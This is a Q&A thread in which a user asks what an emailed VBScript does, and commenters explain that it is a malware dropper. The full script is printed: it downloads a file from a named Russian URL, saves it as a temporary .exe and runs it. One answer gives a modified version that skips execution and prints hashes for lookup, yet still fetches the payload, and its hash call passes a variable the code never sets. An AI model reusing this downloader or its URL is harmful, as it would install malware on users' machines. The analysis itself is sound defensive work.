Possible Extortion of Data

Question

someone sent me an email with a vbs script, but I don't know what it is as I don't know vbs.

I am guessing this is a swindle to extort some data from me, but I can't really tell what data. Can someone please exlpain what would that scrtipt do?

Sub HTTPUpload( myURL, myPath )
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
Const TemporaryFolder = 2
Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
tname = objFSO.GetTempName + ".exe"
myPath = tfolder + "/" + tname
Set objFile = tfolder.CreateTextFile(tname)
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB( objHTTP.ResponseBody )
    objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
Next
objFile.Close( )
objShell.Run(myPath)
Set objShell = Nothing
End Sub
HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""

The script would (try to) download and run something (presumably an executable) from the URL in the last line. — Ansgar Wiechers, Jun 09 '16 at 15:12
`tname = objFSO.GetTempName + ".exe"` would be definitely an executable. Other things the server is in Russia. Also the programming technique is wrong. It's trying to write binary but using text functions. — , Jun 09 '16 at 18:01
@AnsgarWiechers It actually creates an empty `exe` file locally then using the `WinHttpRequest` it injects the binary content of the executable from a remote location then attempts to execute the file using the `WScript.Shell` `Run()` method. — user692942, Jun 10 '16 at 09:42
@Noodles `MidB()`, `AscB()` and `LenB()` are not *"text functions"* they are used against binary data. — user692942, Jun 10 '16 at 09:44
https://blogs.msdn.microsoft.com/ericlippert/2005/04/20/binary-files-and-the-file-system-object-do-not-mix/ — , Jun 10 '16 at 09:52
@Lankymart One can use an ADODB stream object. Just set it to `responsebody`. But you can't write to it direct as it takes a byte array which vbscript doesn't have. See http://stackoverflow.com/questions/37459978/make-script-file-download-excutue/37460257#37460257 — , Jun 10 '16 at 09:57
@Noodles I'm not sure what you are getting at with the article link but if you read it you will realise that it doesn't fail, it just has the potential to fail. It all depends on the default character set the Windows OS is using, but I doubt the attackers are bothered about hitting the percentage who have DBCS. I was simply pointing out that those functions are not *"text functions"*. — user692942, Jun 10 '16 at 10:05
They are text functions, but as usual, you miss the point. The TEXTSTREAM object is a TEXT object. Don't think the example is the only one. It only works western OSs. — , Jun 13 '16 at 10:22
vbscript can take it as a byte array and download binary files. I think there's a limitation of about 200MB however. I had to redo some code in javascript using the .Net 2.0 framework from the vbscript to get a 700mb file but vbscript is well capable of downloading binary data in chunks and executing. — Steve Kline, Jun 13 '16 at 17:03

Steve Kline · Answer 1 · 2016-06-10T02:57:10.257

As the other guy stated, it could very well be a virus. It's downloading binary data, writing it as an EXE and firing itself off.. You could modify it with this code below. ... You could also just delete the email and forget that dude. I know not "Everyone" is as crazy as some of us when it comes to finding viruses in the wild.. we hoard these things and study them.

I've amended some changes that would provide you with a MD5 Hash and SHA256 Hash that's searchable on VirusTotal and delete the file immediately after. You just need to re-append that line for httpUpload... and it will download... but if you see below I removed the line that was attempting to use the .Run method.

HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""

The link you provided is cut off, but if you still have the vbs file, then just remove that whole section of Sub HttpUpload thru End Sub which was right before it... Replace the entire content of the vbs file except for that line mentioned above.

Sub HTTPUpload( myURL, myPath )
    Dim objShell
    Set objShell = WScript.CreateObject( "WScript.Shell" )
    Dim i, objFile, objFSO, objHTTP, strFile, strMsg
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Set objFSO = CreateObject( "Scripting.FileSystemObject" )
    Const TemporaryFolder = 2
    Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
    tname = objFSO.GetTempName + ".exe"
    myPath = tfolder + "/" + tname
    Set objFile = tfolder.CreateTextFile(tname)
    Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
    objHTTP.Open "GET", myURL, False
    objHTTP.Send
    For i = 1 To LenB( objHTTP.ResponseBody )
        objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
    Next
    objFile.Close( )
    wscript.echo "    MD5Hash: " & MD5Hash(sPath) & VbCrLf & " SHA256Hash: " & Sha256Hash(sPath)
    Set objShell = Nothing
End Sub

Function MD5Hash(sPath)
    MD5Hash = bytesToHex(MD5HashBytes(GetBytes(sPath)))
End Function
Function Sha256Hash(sPath)
    Sha256Hash = bytesToHex(Sha256HashBytes(GetBytes(sPath)))
End Function

Function MD5HashBytes(aBytes)
    Set objmd5 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
    objmd5.Initialize()
    MD5HashBytes = objmd5.ComputeHash_2( (aBytes) )
End Function

Function Sha256HashBytes(aBytes)
    'Set objsha256 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
    Set objsha256 = CreateObject("System.Security.Cryptography.SHA256Managed")
    objsha256.Initialize()
    Sha256HashBytes = objsha256.ComputeHash_2( (aBytes) )
End Function

Function StringtoUTFBytes(aString)
    Set UTF8 = CreateObject("System.Text.UTF8Encoding")
    StringtoUTFBytes = UTF8.GetBytes_4(aString)
End Function

Function BytesToHex(aBytes)
    For x = 1 to LenB(aBytes)
        hexStr=Hex(Ascb(MidB((aBytes), x, 1)))
        if len(hexStr) = 1 Then hexStr ="0" & hexStr
        bytesToHex=BytesToHex & hexStr
    Next
End Function

Function BytesToBase64(varBytes)
    With CreateObject("MSXML2.DomDocument").CreateElement("b64")
        .dataType = "bin.base64"
        .nodeTypedValue = varBytes
        BytesToBase64 = .Text
    End With
End Function

Function GetBytes(sPath)
    With CreateObject("ADODB.Stream")
        .Type = 1
        .open
        .LoadFromFile sPath
        .Position = 0
        GetBytes = .Read
        .Close
    End With
End Function

Possible Extortion of Data

1 Answers1